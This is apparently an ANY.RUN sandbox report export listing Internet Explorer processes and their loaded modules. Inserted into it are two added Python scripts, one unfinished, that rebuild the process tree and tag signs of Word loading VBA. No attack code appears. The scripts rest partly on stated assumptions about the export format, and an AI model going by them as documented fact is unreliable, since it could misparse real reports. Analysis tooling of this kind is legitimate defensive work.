c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wininet.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\linkinfo.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll

PID
2476
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\powrprof.dll

PID
1440
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\linkinfo.dll

PID
2828
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1440 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\ole32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\t2embed.dll
c:\windows\syswow64\xmllite.dll
c:\windows\syswow64\winmm.dll
c:\windows\syswow64\uianimation.dll
c:\windows\syswow64\macromed\flash\flash32_27_0_0_187.ocx

PID
1924
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\linkinfo.dll

PID
2640
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1924 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
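
The process blocks above name each parent process but do not number it, which makes the tree hard to read once several Internet Explorer frame and tab processes are listed. The script below is an added example, not ANY.RUN's code: it parses blocks laid out the way this export prints them (the label set is assumed to be the one visible above), recovers the parent PID of each IE content process from the SCODEF:<pid> token in its command line (that token carries the PID of the frame process that spawned the tab), and prints an indented tree with the integrity level and a few flags read off the module list. The sample input is constructed from four of the processes listed above, with their module lists shortened.

```python
# Rebuild the process tree from ANY.RUN "Processes" export blocks.
# Added example (not ANY.RUN's code): the export names each parent but does
# not number it, so the parent PID of an IE content process is taken from the
# SCODEF:<pid> token, which carries the PID of the spawning frame process.
import re
from collections import defaultdict

# Field labels as printed by the export (assumed complete for IE blocks).
LABELS = {"PID", "CMD", "Path", "Indicators", "Parent process", "User",
          "Integrity Level", "Exit code", "Version:", "Company",
          "Description", "Version", "Modules", "Image"}
SCODEF_RE = re.compile(r"\bSCODEF:(\d+)\b")

def parse_process_blocks(text):
    """Return {pid: {label: [value lines]}} for every block starting with PID."""
    procs = {}
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [l.strip() for l in block.splitlines() if l.strip()]
        if not lines or lines[0] != "PID":
            continue
        fields, current = defaultdict(list), None
        for line in lines:
            if line in LABELS:
                current = line
                fields.setdefault(current, [])  # keep empty sections (Indicators)
            elif current is not None:
                fields[current].append(line)
        procs[int(fields["PID"][0])] = dict(fields)
    return procs

def first(rec, label):
    vals = rec.get(label) or []
    return vals[0] if vals else ""

def parent_pid(rec):
    """PID from SCODEF:<pid>; None for frame processes started with -Embedding."""
    m = SCODEF_RE.search(first(rec, "CMD"))
    return int(m.group(1)) if m else None

def notable(rec):
    """Short flags derived from the module list and integrity level."""
    mods = [m.lower() for m in rec.get("Image", [])]
    flags = []
    if any(m.endswith("\\wow64.dll") for m in mods):
        flags.append("wow64")      # 32-bit image running under WOW64
    if any("\\macromed\\flash\\" in m and m.endswith(".ocx") for m in mods):
        flags.append("flash-ocx")  # Flash ActiveX control loaded in-process
    if any(m.endswith("\\jscript9.dll") for m in mods):
        flags.append("jscript9")   # JavaScript engine loaded: page script ran
    if first(rec, "Integrity Level") == "LOW":
        flags.append("low-il")     # sandboxed (low integrity) content process
    return flags

def render_tree(procs):
    """Indented tree: pid, image, integrity level, exit code and flags."""
    children, roots = defaultdict(list), []
    for pid, rec in sorted(procs.items()):
        ppid = parent_pid(rec)
        (children[ppid] if ppid in procs else roots).append(pid)
    out = []

    def walk(pid, depth):
        rec = procs[pid]
        exe = first(rec, "Path").rsplit("\\", 1)[-1]
        line = (f"{'  ' * depth}{pid} {exe} [{first(rec, 'Integrity Level')}]"
                f" exit={first(rec, 'Exit code')}")
        flags = notable(rec)
        out.append(line + (" " + ",".join(flags) if flags else ""))
        for child in children[pid]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(out)

def _block(pid, cmd, path, parent, il, exit_code, modules):
    """Lay one process out the way the export does (constructed sample data)."""
    head = ["PID", str(pid), "CMD", cmd, "Path", path, "Indicators",
            "Parent process", parent, "User", "admin", "Integrity Level", il,
            "Exit code", str(exit_code), "Version:", "Company", "Microsoft Corporation",
            "Description", "Internet Explorer", "Version", "11.00.9600.16428",
            "Modules", "Image"]
    return "\n".join(head + modules)

IE64 = r"C:\Program Files\Internet Explorer\iexplore.exe"
IE32 = r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"
FLASH64 = r"c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx"
WOW = [r"c:\windows\system32\wow64.dll", r"c:\windows\syswow64\jscript9.dll"]
# Constructed sample: four of the report's IE processes, module lists shortened.
SAMPLE = "\n\n".join([
    _block(1440, f'"{IE64}" -Embedding', IE64, "––", "MEDIUM", 1, [IE64.lower(), FLASH64]),
    _block(2828, f'"{IE32}" SCODEF:1440 CREDAT:267521 /prefetch:2', IE32, "iexplore.exe",
           "LOW", 0, [IE32.lower()] + WOW + [r"c:\windows\syswow64\macromed\flash\flash32_27_0_0_187.ocx"]),
    _block(1924, f'"{IE64}" -Embedding', IE64, "––", "MEDIUM", 1, [IE64.lower()]),
    _block(2640, f'"{IE32}" SCODEF:1924 CREDAT:267521 /prefetch:2', IE32, "iexplore.exe",
           "LOW", 0, [IE32.lower()] + WOW),
])

if __name__ == "__main__":
    print(render_tree(parse_process_blocks(SAMPLE)))
```

Run it on a copy of the "Processes" section saved as text to get the same tree for the full report; the flags are only a starting point, and anything more specific (which DLL loaded from an unusual directory, for example) belongs in `notable`.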

Registry activity

Total events
3340
Read events
2583
Write events
756
Delete events
1
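
The modification events that follow are flattened to one field per line, with a name and a value that are sometimes both present, sometimes only one, and sometimes neither, so they are awkward to grep. The script below is an added example, not ANY.RUN's code: it recovers record boundaries from the PID, process, operation triple (the operation label set is an assumption), keeps the one-trailing-line ambiguity explicit rather than guessing, decodes the UTF-16LE paths that Word stores inside its Resiliency blobs, and tags the rows that say what WINWORD.EXE did: the File MRU entry naming the document it opened, the Installer Usage counter for VBAFiles (Office's feature-usage counter for the VBA component), and a TypeLib entry pointing at an .exd file under Temp\VBE, which Office writes when a VBA project loads the MSForms type library. The sample input is constructed from rows of the table below.

```python
# Parse the "Modification events" table of an ANY.RUN report export and pull
# out the entries that say what the Office process did.  Added example, not
# ANY.RUN's code: the export flattens each event to PID / process / operation
# / key followed by zero, one or two more lines (name and/or value), so record
# boundaries are recovered heuristically from the PID, process, operation triple.
import re

OPERATIONS = {"write", "delete key", "delete value"}  # assumed label set
# UTF-16LE Windows path ("C:\...") embedded in a binary registry value.
UTF16_PATH_RE = re.compile(rb"(?i)[a-z]\x00:\x00\\\x00(?:[\x20-\x7e]\x00)+")
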